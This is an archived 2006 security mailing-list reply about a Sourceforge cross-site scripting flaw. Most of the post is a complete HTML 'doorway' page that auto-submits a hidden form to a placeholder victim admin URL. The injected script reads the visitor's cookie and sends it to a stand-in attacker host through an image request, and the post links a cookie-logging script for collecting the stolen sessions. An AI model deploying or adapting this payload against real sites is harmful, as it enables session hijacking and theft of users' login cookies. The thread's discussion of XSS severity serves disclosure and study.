Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:
edgeos



Vulnerability Development: Re: Sourceforge.net XSS

Re: Sourceforge.net XSS

From: ascii <ascii_at_katamail.com>
Date: Fri, 14 Apr 2006 05:15:13 +0200

v9_at_fakehalo.us wrote:
> I understand the possibilities of XSS, however if you
> have to inject it as part of the URL
[cut]

xss are serious bugs, as like header injection and session fixation

xss are less critical than full sql injections + onto outfile in your
cgi-bin directory (for example) or other vectors

anyway, an xss can be exploited in many ways and also in conjunction
with other technologies as like phishing

an other way could be a doorway page as like for http post xss

this is an example

--example.html--

<html>
<head>
 <title>title</title>
 <style type="text/css" media="screen,print">
 body { margin:0; padding:0; }
 body, html{ font-family:"Trebuchet MS", Georgia, Verdana, serif;
color:white; }
 a { color:white; text-decoration:none; }
 </style>
 </head>
 <body onload="document.login_form.submit()"><!-- force gateway, onload -->
 <table width="100%" height="100%" bgcolor="#9BBB38"><tr><td
valign="center" align="center">

  <!-- simple and effective, xss post gateway coded by ascii, vuln by
saidone -->
  <form method="post" action="http://www.VICTIM.TLD/admin/index.php"
name="login_form">
   <input type="hidden" id="user" name="FIELD_username"
value="<script>javascript:alert('XSS vuln, your cookie is
'+document.cookie+'. Now your PHP session is haxored and the cookie
value is sent back to the malicious haxor! (Press OK to send the cookie
value and continue you hajacked navigation..)');document.write('<img
src=\'http://ATTACKER.TLD/cookie.php?cookie='+document.cookie+'\'>');</script>"
/>
   <input type="hidden" id="pass" name="FIELD_password" value="" />
   <!--<button type="submit" name="submit">Vai</button>-->
  </form>
  <div style="background-color: green; height: 95%; width: 95%;"
onclick="document.login_form.submit()"
onmouseover="document.login_form.submit()"><!-- force gateway, onclick
and onmouseover -->
   <h1><a href="#" onclick="document.login_form.submit()">click
everywhere</a></h1><!-- force gateway, onclick -->
  </div>
  <!-- the end : ) -->

</td></tr></table><img src="http://devel.ush.it/track/me.php" /><a
href="http://www.ush.it">www.ush.it</a>
</body>

--/example.html--

cookie.php will store the user session cookie, if you need a generic
logger you could dump any GPC variables as done by this simple script

http://www.ush.it/team/ascii/hack-xsstrap/track.phps

for http get xss you could use meta refresh or document.location
directly (simplier to implement, less code)

regards, ascii, http://www.ush.it/
Received on Apr 13 2006

[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
edgeos